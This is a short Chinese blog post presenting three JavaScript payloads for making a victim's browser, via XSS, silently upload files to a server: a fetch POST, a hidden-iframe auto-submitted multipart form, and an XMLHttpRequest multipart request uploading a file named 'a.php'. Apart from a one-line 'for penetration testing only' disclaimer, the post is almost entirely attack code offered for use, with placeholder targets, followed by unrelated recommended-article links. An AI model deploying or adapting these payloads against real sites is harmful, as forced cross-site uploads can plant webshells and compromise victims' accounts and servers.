使用XSS自动上传表单文件的例子

fjh19972024-05-12 20:55

仅供渗透测试,禁止他用

方案一:fetch

javascript 复制代码 
 let formData = new FormData();
formData.append('name', 'John');
formData.append('file', new Blob(['Hello World!\n']), 'test')
fetch("http://www.baidu,com",
  {
    body: formData, method: "post"
  });

方案二:iframe

javascript 复制代码 
	var Iframe=document.createElement("iframe")
Iframe.name="csrf-frame"
Iframe.style="display:none"
var Form = document.createElement("form");
Form.action = "http://www.baidu.com";
Form.method = "post";
Form.setAttribute("enctype", "multipart/form-data");
 
Form.target = "csrf-frame";
var Input= document.createElement("input");
Input.type='hidden'
Input.name='a'
Input.value='b'
 
const dataTransfer = new DataTransfer();
var fileInput= document.createElement("input");
 Form.appendChild(Input)
 document.body.appendChild(Iframe)
 
dataTransfer.items.add(
          new File(['Hello World!\n'], 'test', {
            type: 'application/octet-stream'
          })
        );
fileInput.setAttribute("name", "file");
 
 fileInput.setAttribute("type", "file");
 
 fileInput.files = dataTransfer.files;
Form.appendChild(fileInput)
var formToSubmit = document.body.appendChild(Form);
formToSubmit.submit();

方案三:

javascript 复制代码 
  if (XMLHttpRequest.prototype.sendAsBinary === undefined) {
  XMLHttpRequest.prototype.sendAsBinary = function(string) {
    var bytes = Array.prototype.map.call(string, function(c) {
        return c.charCodeAt(0) & 0xff;
    });
    this.send(new Uint8Array(bytes));
  };
}
  var boundary = '----ThisIsTheBoundary1234567890';
  var formData = '--' + boundary + '\r\n'
  formData += 'Content-Disposition: form-data; name="source"; filename="a.php"\r\n';
  formData += 'Content-Type: application/octet-stream\r\n\r\n';
  formData += 'Data';
  formData += '\r\n';
  formData += '--' + boundary + '\r\n';
  formData += 'Content-Disposition: form-data; name="message"\r\n\r\n';
  formData += 'message' + '\r\n'
  formData += '--' + boundary + '--\r\n';
 
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'haha', true);
  xhr.onload  = xhr.onerror  = function() {
      console.log(xhr.responseText);
  };
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  xhr.sendAsBinary(formData);
相关推荐
LaoZhangAI17 小时前
Google Gemini AI图片编辑完全指南:50+中英对照提示词与批量处理教程(2025年9月)
前端·后端
用户114818678948417 小时前
从零搭建 Vue3 + Nest.js 实时通信项目:4 种方案(短轮询 / 长轮询 / SSE/WebSocket)
前端·后端
LaoZhangAI17 小时前
Google Gemini Nano与Banana AI完整部署指南:2025年轻量级AI解决方案
前端·后端
用户114818678948417 小时前
基于 Webpack Module Federation 的 Vue 微前端实践
前端
怪可爱的地球人17 小时前
Pinia状态管理有哪些常用API?
前端
小高00717 小时前
🤔函数柯里化:化繁为简的艺术与实践
前端·javascript·面试
却尘17 小时前
React useMemo 依赖陷阱:组件重挂载,状态无限复原
前端·javascript·react.js
Asort17 小时前
JavaScript 从零开始(三):浏览器控制台与VS Code协同工作环境搭建详解
前端·javascript
跟橙姐学代码17 小时前
自动化邮件发送的终极秘籍:Python库smtplib与email的完整玩法
前端·python·ipython
我是ed17 小时前
# vue3 实现甘特图
前端
热门推荐
01GitHub 镜像站点02UV 工具安装与国内镜像源配置指南03UV安装并设置国内源04A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程0546个Nano-banana 精选提示词,持续更新中06KGG转MP3工具|非KGM文件|解密音频07conda中设置镜像地址(附所有可换的地址)08突破百度网盘的下载限速,两种方法教会你【超详细】09Spec-Kit 使用指南10保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)